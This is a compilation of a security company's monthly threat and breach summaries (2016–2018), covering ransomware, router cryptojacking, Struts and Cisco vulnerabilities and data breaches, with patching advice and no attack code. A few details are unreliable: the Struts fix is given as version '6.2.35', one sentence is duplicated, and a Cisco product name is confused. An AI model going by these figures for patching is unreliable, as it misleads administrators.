Our monthly Information Security Report includes a summary of security breaches, threats and vulnerabilities. It is designed to help you gain visibility over the latest events and to help you assess their implication on your environment.

Information Security Report | September 2018


The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

This month features a serious vulnerability in a number of HP printer/fax combinations, a new twist on exploiting MikroTik routers to mine crypto currency, a critical Apache Struts code vulnerability that doesn’t require installed plugins, details of the Reddit 2007 backup database breach, Google’s forthcoming plans to block the injection of third-party code into their browser processes and how to get free replacement Symantec certificates to avoid FireFox untrusted certificate warnings.

Current Threats and Exploits


  • HP Printer/Fax Combo Vulnerabilities:
    Security researchers have discovered a serious vulnerability in a number of HP printer fax combination units. The vulnerability allows a remote attacker to take control of the device by exploiting a vulnerability in the built-in fax modem. The only prerequisites to launch the attack are for the printer to be connected to a phone line and for the adversary to know the fax number of the device. This makes the vulnerability especially suitable for targeted attacks. Once an attacker has gained control of the device, they are able to pivot across to the LAN interface of the device and start launching attacks back into the internal computer network the printer is connected to. During a demonstration, the security researchers who found the vulnerability were able to use the printer to launch the eternal blue exploit against computers connected to the same LAN as the printer.
    HP have released patches for the affected devices and it is strongly recommended you check for updates if you use a HP printer/fax combination device. If you do not make use of the fax component of the device, it is recommended you disconnect it from the phone line to lower the attack surface. (1)
  • Crypto Currency Mining Code Dynamically Injected into Browsing Sessions:
    Attackers have made use of a well-known exploit to compromise over 200,000 MikroTik routers and inject and use them to perform crypto currency mining activities. The attack, however, proceeded in a different manner from the usual. Instead of using the routers to mine crypto currency, they used the router to dynamically inject the coinhive crypto currency mining JavaScript code into HTTP sessions passing through it. This caused users downstream of the compromised router to receive the mining code and begin generating revenue for the attacker. Additionally, if web servers resided behind an affected router, it would also inject mining code into all the HTTP pages delivered by the server. To make matters worse, the affected routers included ISP grade routers, greatly increasing the number of affected users. It is important to note that only HTTP sites are affected, as the router is unable to inject the code into encrypted HTTPS sessions.
    It is recommended that all users of MikroTik routers ensure they have the latest patches installed. (2)
  • Another Critical Apache Struts Remote Code Execution Vulnerability:
    Apache has announced another critical remote code execution vulnerability in their Struts library. It was reported that the vulnerability exists in the Struts core itself and therefore is exploitable without the need for any installed plugins. Additionally, the attack can be performed without the attacker needing to authenticate to the page and it is thought to be very easy for an attacker to determine if a page is vulnerable to the attack.
    Apache Struts users are advised to update to version 6.2.35 or 2.5.17 to mitigate the vulnerabilities ASAP. (3)

 

Recent Breaches


  • Old Reddit Data Exposed:
    Reddit released a statement advising users that they suffered a data breach earlier in the month. According to the statement, the attacker gained access to a backup of the 2007 database containing usernames and salted passwords. While the system was protected by SMS two factor authentication, it was found the attacker was able to capture the second factor using an SMS intercept.
    Users whose data was exposed have been sent an email from Reddit with instructions on the next steps they need to take. Reddit have changed their second factor authentication method to use a token-based method and is recommending all their users to do the same. (4)

Other News


  • Google Chrome to Block Third Party Code Injection:
    A number of anti-virus vendors follow the practice of injecting their own code into web browser processes to add their own protection against malicious sites the user visits. The practice often allows them to restrict the categories of the web sites users can visit and also scan pages for occurrences of malware. While the injection of this code is designed to make the browsing experience more secure, it is not officially supported by the browser manufacturers and can make them unstable. In response to this, Google has announced they will begin notifying users, after a browser crash, of any other software which is injecting code into the browser process. Additionally, Google has announced that in future versions of Chrome, they will begin to outright block the injection of third-party code into their browser processes. It is currently not known what impact (if any) this will have on the overall security of web browsing using Chrome, and the feature is still in a trial rollout phase. Additional information will be provided by Google in the coming months. (5)
  • Browsers to Distrust Symantec TLS Certificates:
    The nightly build of FireFox version 63 is now showing an untrusted certificate warning for certificates issued by Symantec. The action has seen the distrust of all Symantec issued certificates, as well as subsidiary certificate authorities including Thawte, GeoTrust and RapidSSL. It is recommended that website administrators replace certificates issued by the above certificate authorities as soon as possible. Digicert (who has taken over the issuance of Symantec issued certificates) is offering a replacement certificate at no additional cost to the administrator. By updating the certificate, it will ensure users are not presented with the invalid certificate warning page when visiting your site. It is recommended that website admins obtain new certificates no later than October 2018 as this is when the feature is planned to be introduced into the mainstream versions of both FireFox and Google Chrome. (6)

References

Information Security Report – March 2018


Current Threats and Exploits


  • Crypto Miners Are Sneaking To Your Networks – Despite dropping off a little in the news this month, crypto currency is still a much sought after commodity for many. Attackers are looking to cash in on this to do anything possible in order to make good use of your idle CPU time. In the past we have seen malware, advertising, worms and phishing campaigns aiming to deploy mining scripts or software on unsuspecting victims. It was recently reported that a large number of websites around the world were hijacked with crypto mining scripts as a result of a compromised plugin script. As a result of this, users visiting the site were redirected to execute coinhive mining scripts for the attacker, and although this method is used by advertisers to monetise sites, the incident highlighted the importance of knowing your online supply chain (and where you get your web resource scripts from).
  • Shortened URLs In Phishing – It has been observed in the wild that shortened URLs are increasingly being used again by active phishing campaigns. As a result of this, one of the core user awareness points for phishing of looking at the link is bypassed as most users will recognise and trust shortened URL services (such as Google and Bitly). Typically seen in campaigns targeting web mail credentials, this attack vector poses a significant risk to organisations and emphasises the importance of web content filtering. It is also recommended that users are made aware to be on the lookout for this type of activity.
  • Memcache Denial of Service Attacks – A huge number of Denial of service attacks are being staged from misconfigured internet facing memcache servers. These severs accept easily forged udp packets and this makes them perfect for reflected and amplified denial of service attacks. As this service was not designed to be exposed to the internet it is unlikely that any additional security will be configured, the remediation is to firewall off this service from the internet.

Read more on SANS ISC InfoSec Forums

Recent Breaches


  • Unsecured AWS Once Again Makes News – Poorly secured AWS S3 buckets continue to be a problem. Researchers have notified the LA Times after it was discovered that their unsecured Amazon S3 bucket had been cryptojacked and has been mining Monero cryptocurrency. The LA Times did not correctly configure their S3 buckets and as a result it was publicly writable.

Read more on naked security

Other News


    • Notifiable Data Breaches Scheme Comes into Effect – Australia’s Notifiable Data Breach scheme came into effect this month. This amendment to the Privacy Act enforces businesses under certain conditions to report data breaches to the Office of the Australian Information Commissioner. It is recommended that all organisations become aware of their responsibilities under these changes and update incident response plans as required to include these potential actions. For additional information please engage with your legal and / or privacy team.

Read more on ZDNet

    • Chrome will label HTTP sites as not secure – Starting from July the web browser Google Chrome will label sites visited using HTTP as non-secure. This is a move to hopefully uplift HTTPS adoption and ensure that sites default to the HTTPS version of the website.

Read more on ars TECHNICA

  • Importance of Multifactor Authentication In the Modern Enterprise – Multifactor authentication is a practical way to add security to the logon process by requiring multiple forms of identification as an addition to the username/password sequence. As the number of password exploits continue to increase, enterprises should look into available multifactor tools and integrate them into their infrastructure so as to secure logins and access to resources.

Read more on Search Security

Information Security Report – February 2018


Over the past month, we have seen a number of threats, vulnerabilities, and spear phishing attacks affecting organisations worldwide. Read on for a summary of these events to help you assess their implication on your environment.

Current Threats and Exploits


  • Refined Exploits Targeting Legacy Windows Servers and PCs: – The vulnerabilities discovered in SMBv1 servers (CVE-2017-0146 and CVE-2017-0143), can be used by remote attackers to execute arbitrary code via crafted packets, to the Microsoft SMB servers. Three exploits linked to these Microsoft vulnerabilities, have been rewritten and stabilised and can now impact all Windows operating systems starting with Windows 2000 up to and including Server 2016 edition. It is highly recommended to apply all software patches available as it is reported that these exploits are being used by worm malware to enable them to spread. Additional details on the recommended actions to take against these exploits can be found in the references below. (1)
  • WannaMine: Cryptocurrency Mining Malware: An EternalBlue based malware dubbed WannaMine was discovered to be using computing resources to mine cryptocurrency on infected systems. The malware initially uses password harvesting kit Mimikatz to steal usernames and passwords from system memory and EternalBlue exploits in order to spread around the network. (2)(3)
  • CISCO ASA Remote code execution and Denial of Service vulnerability:  A vulnerability in the Cisco SSL VPN functionality of Cisco ASA was discovered and is being actively scanned and attacked across the internet. Successful attacks allow the attacker to reload the device resulting in a denial of service, or run arbitrary code on the device by sending crafted XML packets to the webVPN interface. Users of Cisco ASA devices are recommended to check the running operating system version and upgrade soon as possible.(4)
  • Cisco IOS and IOS XE Software EnergyWise Denial of Service Vulnerabilities:  Multiple vulnerabilities in the EnergyWise module of Cisco IOS and Cisco IOS XE Software have been disclosed. These are caused by the improper parsing of crafted EnergyWise packets destined to an affected device. These vulnerabilities could allow an unauthenticated, remote attacker to cause a buffer overflow condition or a reload of an affected device, leading to a denial of service (DoS) condition. Cisco has released software updates that address these vulnerabilities. (5)
  • Lenovo Networking OS backdoor: A backdoor that has existed since 2004 has been removed from the Lenovo Networking OS in use by 16 IBM and 16 Lenovo network switches. This backdoor allows for administrative access to the device and Lenovo claim the backdoor was placed into the product by the now-defunct Nortel Networks. (6)
  • CISCO ASA 9000 IPv6 Fragmentation Packet Denial of Service:  Due to an incorrect handling of IPv6 packets in the Cisco ASA 9000 series, an unauthenticated reload of trident line cards is possible in routers running Cisco IOS XR Software Release 5.3.4. with IPv6 configured. Cisco have released software updates that resolve this issue. (7)(8)

Recent Breaches


  • Russian hackers hacked and published 2018 Winter Olympics emails: It is reported that Russian hackers calling themselves ‘FancyBear’ have retaliated to the banning of Russia from participating in the Winter Olympics by releasing emails regarding Olympic games scheduled in February in South Korea. It is alleged that the group is associated with military intelligence. The International Olympic Committee have not commented on the allegations brought forward by the leaked documents. (9)

Other News


  • Netflix phishing campaign: A phishing campaign was reported to hijack the Netfilix brand by tricking users to handing over their login details, credit card, mugshot, and their ID. The fraudsters used a fake website that had a valid HTTPS certificate to attempt to reassure users of the legitimacy of the website. (10)

References

Information Security Report – January 2018


Current Threats and Exploits


  • Meltdown? Spectre? Where Can We Find Out More? – Early January saw the industry start the year with a bang as rumors of an Intel bug being released online. Google’s Project Zero quickly announced on the 3rd of January that nearly all modern processors are affected by a vulnerability that when exploited can allow for potentially sensitive information to be accessed from memory across local security boundaries. A combined response from processor and operating system vendors is currently underway with most vendors releasing a statement or patch where applicable. It is recommended that local administrators investigate their organisations exposure to the bug and begin a remediation plan where possible. Additional detail and vendor responses can be found in the references below. (1, 2, 3, 4)
  • Risks Created by Bitcoins Surge in Popularity – Driven by the rise in value of bitcoin over in recent months, crypto currency has become a hot topic for those in and out of the IT space. With a large number of people newly becoming curious or looking to make some quick money in crypto markets, scammers and attackers have also been thinking about how they can leverage the new found popularity of these currencies. In recent months there has been an increase in bitcoin related phishing and online scams in an attempt to either steal bitcoin or wallet private keys / passwords from unsuspecting users.

Recent Breaches


  • Forever 21 POS Malware Reminds about Encrypting Data at Rest – Retailer Forever 21 announced that for 7 months last year a number of cash register and point of sale devices were infected with malware that was successfully able to swipe payment card details. In addition to this it was reported that the malware was also present on some systems and were able to view transactional logs on a central server that were generated by non-compromised devices. It has been confirmed that encryption on these devices was not always enabled, and during periods where encryption was not enabled the logs could be read by the malware which would search for payment card details. Although POS malware is a constant threat, it is also important to ensure you are aware of all systems in your organisation that hold or process any form of payment card information. Regular testing and quality control of controls such as encryption of data at rest, and reduction of sensitive information in logs can ensure that in the event of compromise, the malware would not be able to find sensitive information. (8)
  • Leaky (S3) Buckets At it Again – Once again, a publicly exposed Amazon S3 bucket containing sensitive information was found. This time the information contained details on an estimated 123 million American households. With more companies using cloud services for storage and business, it is important to gain a good understanding of the access controls in place for data kept in the cloud. Regular reviews of access to your cloud services and data is also recommended. If you are looking for more information about securing S3, see this article here. (9)

Other News


  • What to expect in 2018 – With 2017 teaching us all some new lessons about patch management, ransomware, crypto currencies and securing the cloud, it is expected that 2018 will provide a similar education. With more companies looking to invest in the cloud and in new technologies, there is an increased risk in how we can better secure the modern business. The internet of things and the issues these devices have faced in the past is a constant reminder of this. Further to this it is expected that financially motivated cybercrime will remain a constant threat through the means of social engineering/phishing, crypto-currency targeted malware and possibly more organisation specific ransomware. From a defender perspective, it is expected that two factor authentication (2FA) will increase significantly. As many credential based attacks can be mitigated by enabling 2FA, and with 2FA gaining wide-spread support (especially in the cloud and online services), 2018 should see a welcomed increase in 2FA uptake. (10)

References

Information Security Report – December 2017


Over the past month, we have seen a number of threats, vulnerabilities, and spear phishing attacks affecting organisations worldwide. Read on for a summary of these events to help you assess their implication on your environment.

Threats and Exploits


Mailsploit

Mailsploit Allows Spoofed Mails to Fool DMARC. Mailsploit is a collection of vulnerabilities in various email clients which allow an attacker to perform code injection attacks, spoof senders and bypass email protection mechanisms such as DMARC(DKIM/SPF). The security researcher who developed Mailsploit described how Mailsploit allows an attacker to send emails from any address they choose by taking advantage of how servers validate the DKIM signature of the original domain and not the spoofed one. It has been reported that this technique does not currently get detected or blocked by the majority of mail client vendors.

All major email clients and web mail vendors were notified about Mailsploit prior to its public release, however a large number of popular clients still remain vulnerable.

The list of impacted mail clients can be found here >>

It is recommended that users should update their email client whenever there’s a software update available, use end-to-end encrypted messages for personal conversations and at work and/or use PGP/GPG to verify the identities and encrypt email contents.

You can read more on Mailsploit on info security magazine and mailsploit.com

Spear Phishing

Huge Increase in Email Impersonation Attacks: According to Email Security Risk Assessment (ESRA) report, a report released byMimecast Data Security, it was discovered that although organisations continue to face an ongoing threat from malware, the fastest growing threat is impersonation attacks. An organisation is seven times more likely to be hit by an impersonation attack than by email-borne malware. These attacks are also known as whaling or spear phishing where attackers trick recipients into wiring money transfers to the fraudster. These scams are highly targeted and often done after a cybercriminal has gathered enough information to send the right person the right message. These attacks continue to grow faster than malware due to the fact that it’s very hard for traditional defenses like email filters to detect them.

Good user training will give an edge in avoiding most of these payment and impersonation scams. A few other tips for security teams to help combat the social engineering threat include:

  • Conducting internal phishing by phishing your own employees and sharing the results of the testing with them so that they can learn what to look out for. This should be combines with good training on how the users can detect the phishing emails.
  • Impersonation attacks often try to mimic emails from C-level executives. Implement a company policy that closes scam avenues for would-be spear phishers (e.g., never request the sharing of sensitive documents via email).
  • Disable links inside email bodies to force users to manually navigate to the site mentioned in the email. It adds extra steps, but it can prevent a user from clicking on a phishing link by accident.

Read more on info security magazine and TechRepublic

 

Security News and Alerts

Get updates and exclusive content from our security experts
  • This field is for validation purposes and should be left unchanged.

 

Breaches


Virtual Keyboard App Data Breach

Massive Breach Exposes Keyboard App that Collects Personal Data on its 31 Million Users. A team of security researchers have discovered a huge trove of personal data of the users of the virtual keyboard app ‘AI.type’ that was accidentally leaked online for any one to download. This app is a customization for on-screen keyboards on mobile phones and tablets with more than 40 million users worldwide. It is reported that the app requests for ‘full access’ to all user data stored on the phone and appears to collect everything from contacts to keystrokes. The leaked data includes full names, phone numbers, email addresses, device information including device name, screen resolution, model details, android version, mobile network name, country of residence, GPS location and even links and information associated with social media profiles.

Events such as this raise the question about what permissions mobile applications have on our devices (and just how much access these applications NEED). In order to best protect yourself against this form of application privilege abuse, it is recommended to always read and be cautious of what access is granted to applications.

Read more on The Hacker News

Uber Technologies Data Breach

Personal data of 57 million customers and drivers was stolen last year from ride-sharing company Uber with the breach revealed to have been concealed by the company for more than a year. It is suggested that the company paid $100,000 to the attackers. The company however advised that no social security numbers, credit card information, trip location details or other data were taken. Uber is being condemned for how it chose to deal with the issue after discovery of the attack and has also been sued for negligence over the breach by a customer.

It is reported that two attackers were able to retrieve login credentials from a private GitHub coding site which they used to access Uber data from an Amazon Web Services account where they discovered customer and driver related information. Although there are state and federal laws in the United States that require companies to alert people and government agencies when sensitive data breaches occur, Uber failed to comply.

Read more on Bloomberg.com

Breach at PayPal Subsidiary Affects 1.6 Million Customers. Paypal disclosed on 1st December 2017 a data breach on its recently acquired company TIO Networks. Personal information for 1.6 million individuals may have been compromised. TIO is based in Canada and serves some of the largest telecom and utility network operator in North America. Paypal pointed out that the Paypal platform has not been impacted as the TIO systems have not been integrated into its own platform. Paypal advised that affected companies and individuals would be contacted via mail and email, and offered free credit monitoring services via Experian. The data breach was discovered as part of ongoing investigations for identifying vulnerabilities in the processing platform.

Read more on SecurityWeek.com

Other News


Simulated Attacks Uncover Real-World Problems in IT Security. A research report by SafeBreach, a cybersecurity company that has developed a platform that simulates hacker breach methods, reveals that virtual hackers “have a 60% success rate of using malware to infiltrate networks. And once in, the malware could move laterally almost 70% of the time. In half the cases, they could exit networks with data.” The research found that it was not hard to get past the perimeter and once in, it was easy for attackers to move around and exfiltrate data. This is because most organisations overlook concerns over lateral movement as they mostly focus on the perimeter.

According to the report, malware infiltration methods like nesting or “packing” malware executables were effective in bypassing security controls 50% of the time. The success rate of infiltrating a network using packed executables was found to be 55%-61% using JavaScript, VBScript (VBS) using HTTP and using HTML file format (CHM) extension. It is recommended that network security controls should be VBScript (VBS) using HTTP and using HTML file format (CHM) extension. It is recommended that network controls should be configured to scan for malicious files and block them before they make their way to the endpoints/hosts for installation to disk. The report
further outlines how cybercriminals exfiltrate data using the easiest methods which are often through traditional clear or encrypted Web traffic. Ports having the highest exfiltration success rate include Port 443 (HTTPS) and Port 123 (NTP).

It is recommended that in order to better protect resources, organisations should optimize their current security solutions, constantly update the configurations as needed, and then test the changes they make.

Read more on DARKReading.com

December 2016 Internet Security Report


Merry Christmas and a Happy New Year! December 2016 was full of the usual Phishing, Malvertising, weak security of IoT devices and large breaches of user accounts that the rest of the year had delivered. If you have a Yahoo email account or an email service that is run through Yahoo’s mail service, please change your passwords for those accounts and consider moving to another provider as Yahoo has had two major publicly disclosed breaches in 2016 alone.

If you are still thinking of a new year’s resolution, please consider “changing your passwords to passphrases”.

Threats

Breaches

  • Yahoo released in December that there was another breach, separate from the previously disclosed breach earlier in the year. In this newly disclosed breach, the thieves stole more than a billion user accounts’ data. Yahoo states that “potentially affected accounts, the stolen user account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or un-encrypted security questions and answers.”
    If you have a Yahoo account please change your password for this account. If you have used your Yahoo account password for anything else, please change that password too.
    https://krebsonsecurity.com/2016/12/yahoo-one-billion-more-accounts-hacked/

Patches and Updates

November 2016 Internet Security Report


The ransomware threat continued to thrive with new variants, payloads and even using social media as a delivery platform. A vulnerability found in a German ISPs router caused havoc in late November with almost 1 million users knocked into darkness as the result of a recent increase in Mirai worm activity. Social engineering was brought into the spotlight again as the hospitality industry was targeted through customer service channels in order to compromise payment services. Data breaches also got their fair share of coverage in November with credit card information being stolen and the insider threat re-emerging to create headaches.

Threats

  • The ransomware threat continues to bother internet users with a new Locky variant employing the use of .zzzzz extensions. This variant was first seen in late November and is delivered through office documents (mainly .xls and docm) containing an encrypted .dll payload that is unencrypted, dropped into the users /temp/ directory and executed by rundll32. This is different to the other variants of the ransomware that typically used macro embedded documents to retrieve the payload from the internet before executing. This threat can be better mitigated by ensuring that AV is up to date and where possible controls are in place to stop the execution of files from the /temp/ directory. Further to this, as most of these new variants are delivered emails from spoofed addresses, it acts as a reminder to review your domains and email servers’ SPF records and policies.
  • November saw the re-introduction of social media messaging being used to compromise users through malicious image attachments containing ransomware. Dubbed ‘ImageGate’ by researchers at CheckPoint the attack uses Facebook and LinkedIn messaging services to spam and compromise users with Locky ransomware at scale. This attack leverages the trust of your social media friends and contacts to lure users into clicking on seemingly harmless files. The issue has since been patched, however, this serves as a reminder to always think before you click and when in doubt ask.

Read More
http://thehackernews.com/2016/11/facebook-locky-ransomware.html
http://www.csoonline.com/article/3143173/security/malicious-images-on-facebook-lead-to-locky-ransomware.html

  • Social engineering attacks leverage a user’s trust in order to get them to perform an action that negatively affects them. These attacks can range from simple phishing campaigns looking for easy money or passwords to complex multi-stage operations that aim to compromise internal networks for theft of sensitive information or destruction. One recent example of a complex social engineering operation was identified in November where actors possibly related to the Carbanak Gang targeted a number of hospitality companies in order to compromise payment systems to steal credit card information. The attacks were centralised around customer service call centres where attackers would claim to have issues in accessing online services. The attacker would then email the customer service staff containing malicious attachments and persist until the employee opened the attachment and downloaded the malware. This attack serves as a reminder to businesses to understand their external facing teams that have unvetted access to the public (service desks, HR, finance, legal, reception etc.) that could possibly be vulnerable to this sort of attack.

Read More
http://www.computerworld.com/article/3141735/security/malware-attack-starts-with-a-fake-customer-service-call.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Carbanak-/-Anunak-Attack-Methodology/?page=1&year=0&month=0

 

Breaches

  • On Friday the 25th of November, SFMTA’s Municipal Rail was infected by Mamba Ransomware. “Computer screens at MUNI stations displayed a message: “You Hacked, ALL Data Encrypted. Contact For Key(cryptom27@yandex.com)ID:681 ,Enter.” MUNI Spokesman Paul Rose spoke to the Examiner and noted that his agency was “working to resolve the situation,” but refused to provide additional details.

Read More
http://www.theverge.com/2016/11/27/13758412/hackers-san-francisco-light-rail-system-ransomware-cybersecurity-muni
https://krebsonsecurity.com/2016/11/san-francisco-rail-system-hacker-hacked/

  • In the last week of November, a large number of Deutsche Telekom customers had their routers infected with a computer worm which takes full control of the router. Once the worm has control of the device, it is joined to a network of other routers and IoT (Internet of Things) devices to be used in a botnet. These botnets are then used mainly for DoS (Denial of Service) attacks against public facing websites and other infrastructure. “More than 900,000 customers of German ISP Deutsche Telekom (DT) were knocked offline this week after their Internet routers got infected by a new variant of a computer worm known as Mirai.

Read More
https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/

  • The Madison Square Garden Company has announced that hackers spent up to a year harvesting credit card credentials of potentially millions of visitors as a result of the compromise of a payments processing system. Although the exact number of affected cards is unknown it was determined that cards used to buy merchandise, food, and drinks between November 9, 2015, and October 24, 2016, may have been affected. The incident itself was identified by banks noticing a trend of fraudulent transactions on cards that were used at MSG venues. On informing MSG an investigation was conducted into the network which revealed unauthorised third parties access the payment processing systems.

Read More
http://www.zdnet.com/article/madison-square-garden-admits-hackers-spent-a-year-harvesting-visitor-credit-card-data/
http://notice.themadisonsquaregardencompany.com/customerupdate/

  • UK network operator ‘Three’ experienced a suspected insider threat attack in which 3 were arrested after having accessed a database containing customer’s phone upgrade information as a means to intercept the delivery of new phone handsets.

Read More
http://www.infosecurity-magazine.com/news/three-arrested-after-suspected/
http://www.infosecurity-magazine.com/news/three-breach-hit-133000-customers/

Patches and Updates

  • There is a live, actively exploited 0-Day vulnerability that has just had a patched released by Mozilla Firefox. The vulnerability is CVE-2016-9079. The patched version number is 50.0.2.

Read More
http://arstechnica.com/security/2016/11/tor-releases-urgent-update-for-firefox-0day-thats-under-active-attack/

  • Microsoft has released an overview of the number of ransomware based detection improvements that were implemented as part of the Windows 10 Anniversary Updates.

Read More
http://wincom.blob.core.windows.net/documents/Ransomware_protection_in_Windows_10_Anniversary_Update.pdf

Other

  • Software made by Shanghai ADUPS Technology has been siphoning text messages and call records from cheap Android-based mobile smart phones and secretly sending the data to servers in China. ADUPS software is typically bundled with smart phones made by dozens of global wireless firms including ZTE, BLU, and Huawei. Most of these devices are very cheap in comparison to leading devices, partly due to these devices having on-screen advertisements.

Read More
https://krebsonsecurity.com/2016/11/chinese-iot-firm-siphoned-text-messages-call-records/

  • Big W has confirmed that it experienced a technical glitch in early November that resulted in customer information being pre-populated with other users’ information on its online store. Post investigation Big W announced that no passwords, bank or credit card details were compromised and that they were notifying the affected users.

Read More
http://www.zdnet.com/article/big-w-confirms-customer-data-exposure/

  • WordPress recently found and patched a major vulnerability that luckily was not being actively exploited. There was a remote code execution flaw found in an open-source PHP webhook within the WordPress update server, api.wordpress.org. This problem with the webhook is that it let developers supply their own hashing algorithm to verify that code updates are legitimate. “Given a weak enough hashing algorithm, attackers could brute-force attack the webhook with a number of guesses that wouldn’t trigger WordPress’s security systems.
  • WordFence managed to come up with an algorithm that reduced the amount of guesses from 400,000 to only 100,000 guesses, with randomly generated keys, at the hash value of the shared secret key. That guessing would only take a few hours. With the door successfully battered down, attackers could then send URLs to the WordPress update servers, which would then push them out to all WordPress sites.”

Read More
https://nakedsecurity.sophos.com/2016/11/25/the-wordpress-megahack-that-wasnt/

  • Deliveroo in the UK had a number of accounts hijacked and a number of fraudulent orders placed. Deliveroo are stating that their application was not in fact to blame for the hijacked. They are claiming that the cause of the fraudulent transactions is a result of users having the same username and password for multiple services/accounts and that another company must have been breached for the credentials./li>

Read More
https://nakedsecurity.sophos.com/2016/11/25/fraudsters-eat-for-free-as-deliveroo-accounts-hit-by-mystery-breach/

October 2016 Internet Security Report


Joomla takes the cake for most serious exploits doing the rounds this month, with a combination of account creation and privilege escalation vulnerabilities proving an easy way to take complete control of various versions of Joomla. The diagnosis is grim for anyone who was not paying enough attention to patch within 24 hours as mass exploitation of these vulnerabilities have been reported, if you have not patched you should assume your Joomla site is already compromised.

Threats

  • Joomla 3.6.4 was released to address account creation, elevation, and modification vulnerabilities that are being actively exploited in mass across the web just days after the vulnerabilities were disclosed. Anyone who has not already updated should consider their site compromised.
    https://www.joomla.org/announcements/release-news/5678-joomla-3-6-4-released.html
  • Microsoft patched 45 security flaws in their October 2016 patches, one of which is being actively exploited as part of a malvertising campaign. This also being Microsoft first month with their new patching approach, removing the ability to pick-and-choose patches to apply. This new system puts much more pressure on software maintainers to push out patches for their applications that break due to patching, as companies would otherwise have to choose with being vulnerable to exploits, or have a functional application.
    https://technet.microsoft.com/en-us/library/security/ms16-oct.aspx
  • Google has released some unpatched 0-day vulnerabilities in Windows after the time limit of responsible disclosure of actively exploited vulnerabilities ran out. This vulnerability has no patch available and is “local privilege escalation in the Windows kernel that can be used as a security sandbox escape”. Windows 10 Anniversary update is not vulnerable and Microsoft reports that older versions of Microsoft will provide patches on Tuesday, November 8.
    https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html
    https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/
  • Linux Kernel local privilege escalation vulnerability known as Dirty COW has been patched 9 years after its introduction. As this vulnerability has existed for so long, it will affect practically all Linux-powered devices, from cars, to android phones, routers, etc… Cleaning up this Dirty COW is not going to be easy, with many devices simply no longer supported, or patches take months to be released.
    http://dirtycow.ninja/
  • DNS hosting provider DynDNS has been hit by a huge DDoS attack that shook much of their services offline. Being a DNS provider this had very long reaching effects with many major websites being brought offline because users were unable to perform DNS lookups for websites using DynDNS services.
    Read more on Krebs on Security website
  • Spam has been found to be delivered through a calendar invite file “.ics” that contained a cancellation request with many recipients. Depending on how the calendar invite is managed it could cause the spam email to be forwarded to all the recipients from your email address.
    https://isc.sans.edu/forums/diary/Spam+Delivered+via+ICS+Files/21611/

Breaches

Other

  • The Privacy Amendment (Notifiable Data Breaches) Bill 2016 has passed its second reading in the Australian House of Representatives. If passed, this bill will require entities subject to the Privacy Act 1988 to issue a notification in case personal information (that may result in serious harm) gets lost.
  • The Register has published an interesting post on the potential liabilities of being hacked.
    http://www.theregister.co.uk/2016/10/14/been_hacked_what_are_you_liable_for/

September 2016 Internet Security Report


September 2016 successfully delivered an eventful month for cyber security with a handful of threats, breaches and interesting developments in the security of Internet of Things devices. A Denial of Service attack on the website of investigative journalist Brian Kerbs was found to be largely comprised of compromised Internet of Things devices.  Ransomware continued to cause troubles for computer users on all level with a number of new variants and delivery methods being mixed into the threat landscape.

 

Threats

  • Ransomware continues to be a major threat to organisations worldwide with cybercriminals finding new ways to infect users. This month a new variant of ransomware called Mamba was identified which encrypts the whole disk instead of individual files. This is achieved by using a pirated version of the open source disk encryption tool DiskCryptor to encrypt the victim’s hard drive(s). Similar to most other ransomware variants, Mamba uses malicious attachments to deliver its payload and compromise the user’s system.Please ensure that you have adequate backup and restore policies in place and routinely test them to reduce the threat posed by Ransomware.

https://threatpost.com/mamba-ransomware-encrypts-hard-drives-rather-than-files/120730/
https://nakedsecurity.sophos.com/2016/09/27/mamba-ransomware-strikes-at-your-whole-disk-not-just-your-files/

  • A new Ransomware campaign appears to be targeting educational institutions and government agencies. This Ransomware is called MarsJoke and is distributed via emails with a link that downloads a file called ‘file_6.exe’. These emails bare the branding of popular shipping and postal companies.

https://threatpost.com/marsjoke-ransomware-targets-edu-gov-agencies/120856/

  • Victorian Police have released an advisory that unmarked USB drives have been placed in the letterboxes of Melbourne residents. The USB drives contain malicious software which appears to render victim computers useless.If you receive an unexpected USB drive in the mail, do not plug it into your computer or other devices. On top of malware contained on USB devices, these devices can contain hardware to emulate your computers keyboard and mouse to deliver malware, or in the case of the “USB Killer” permanently disable your USB port or even your computer.

http://www.businessinsider.com.au/melbourne-residents-are-receiving-harmful-usb-drives-in-their-letterboxes-2016-9
https://www.usbkill.com/usb-killer/8-usb-killer.html

  • APT group under the names APT28, Fancy Bear, Sednit, and Pawn Storm are undergoing a phishing campaign targeted at Mac OS X users. The campaign involves emails sent with attachments designed to look like a PDF document, however, the attachment is not a pdf document but an executable that opens a pdf document after running it in order to not arouse suspicion. User interaction is still required to deliver malware, but Mac users may be less cautious after the common fallacy that Mac OS X does not have viruses.

https://threatpost.com/sofacy-apt-targeting-os-x-machines-with-komplex-trojan/120882/

  • Malvertising is a term used for an online add or pop-up that is used as a means to compromise an end user through malicious scripting. These malicious ads are encountered as a result of general internet use and are often able to seamlessly compromise a user without generating visual prompts. Although not a new method for actors to compromise a host it has recently seen a resurgence in certain cases to spread ransomware.One example of this occurring recently was when popular website answers.com was observed to have been distributing malware through embedded advertising where users would be exposed to the RIG Exploit Kit serving up ransomware potentially without answers.com even realising it was happening.Ensuring that your operating system and applications are adequately patched is still the most effective way to mitigate this sort of drive-by download attack.

https://blog.malwarebytes.com/cybercrime/exploits/2016/09/rig-exploit-kit-takes-on-large-malvertising-campaign/
http://www.infosecurity-magazine.com/news/malvertising-attack-threatens-2/

 

Breaches

  • Point of Sale merchant H&L Australia has reportedly been breached by an unknown threat actor. The treat actor allegedly sold access to a database server and it is believed that at the very least a 14.1Gb database dump has been stolen. Customers of H&L Australia include Australian Leisure and Hospitality Group who operate around 330 pubs and clubs in Australia.

http://www.theregister.co.uk/2016/09/20/exclusive_hackers_claim_pos_tech_firm_breach/

